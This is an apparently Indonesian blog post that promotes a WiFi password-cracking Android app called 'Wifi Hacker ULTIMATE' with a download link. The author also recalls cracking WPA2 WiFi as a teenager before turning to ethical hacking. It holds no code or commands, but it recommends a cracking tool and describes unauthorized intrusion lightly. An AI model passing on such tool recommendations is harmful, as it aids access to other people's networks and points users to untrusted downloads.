Sekali proses ini komplit, anda bisa memilih jaringan anda (penting untuk tidak mencoba piranti ini di luar jaringan anda, karena hal ini merupakan pelanggaran hukum), dan periksa keamanannya. Jika anda bisa melihat kata kunci, hal tersebut merupakan ide yang baik untuk merubahnya hal tersebut berarti bahwa siapapun penggunannya bisa memasuki jaringan anda.


Wifi Hacker ULTIMATE Wifi adalah sebuah piranti yang tidak boleh di gunakan tanpa pengetahuan khusus tentang jaringan, karena walaupun hal tersebut mudah untuk di gunakan dan bisa membantu anda mengamankan koneksi anda sendiri, konsekuensi dari penggunaan yang tidak tepat bisa sangat merugikan. Jadi seperti yang mereka katakan, Tanggung sendiri resiko penggunaannya. hehehe...


Bagi yang berminat anda bisa langsung donwload di link dibawah ini  download wifi hacker  ultimate android


Sebelum saya berkuliah, waktu saya bersekolah, saya rajin mempelajari ilmu tentang hacking, bahkan saya berhasil beberapa kali melakukan serangan hacking yang bisa dibilang tidak baik untuk ditiru. Saat itu saya tidak tahu bagaimana itu white hat, karena saya saat itu masih terlalu muda dan mencari kebebasan, saya mencoba hacking apa saja, lalu saya berhasil menghack WiFi dengan enkripsi WPA2 dengan metode yang cukup populer saat itu.

Setelah saya melakukan semua hacking ini, saya merasa gelisah, karena yang dilakukan ini tidak baik, setelah saya mengeksplor lebih jauh, saya sadar saya hanyalah hacker dengan kemampuan rendah, saat saya berkuliah saya memutuskan untuk tidak melakukan hacking yang tidak baik, ilmu yang saya dapatkan berupa, keamanan diri, saya mampu mengamankan jaringan saya sendiri dari serangan yang berpotensial, sebenarnya kemampuan ini dapat dipelajari dari mata pelajaran tertentu, tetapi, saya mendapatkanya dari pengalaman melakukan hacking.
Kita menjadi lebih aware dan lebih waspada, kita memahami cara membuat password yang sulit untuk dibobol, kita paham cara mengamankan saluran jaringan kita, kita paham struktur dan cara kerja teknologi yang umum kita gunakan, seperti WiFi, Website, Software, dan masih banyak lagi tentunya.
tentu masih banyak dampak positif, terutama bagi hacker ahli, mampu programming sampai ke sistem, mampu socket programming, mampu social engineering, dapat mendeteksi kelemahan, dapat menyerang dengan efektif.
Tentu saja dapat menghasilkan uang dengan cara menjadi bagian keamanan jaringan atau ethical hacking.
Stay safe!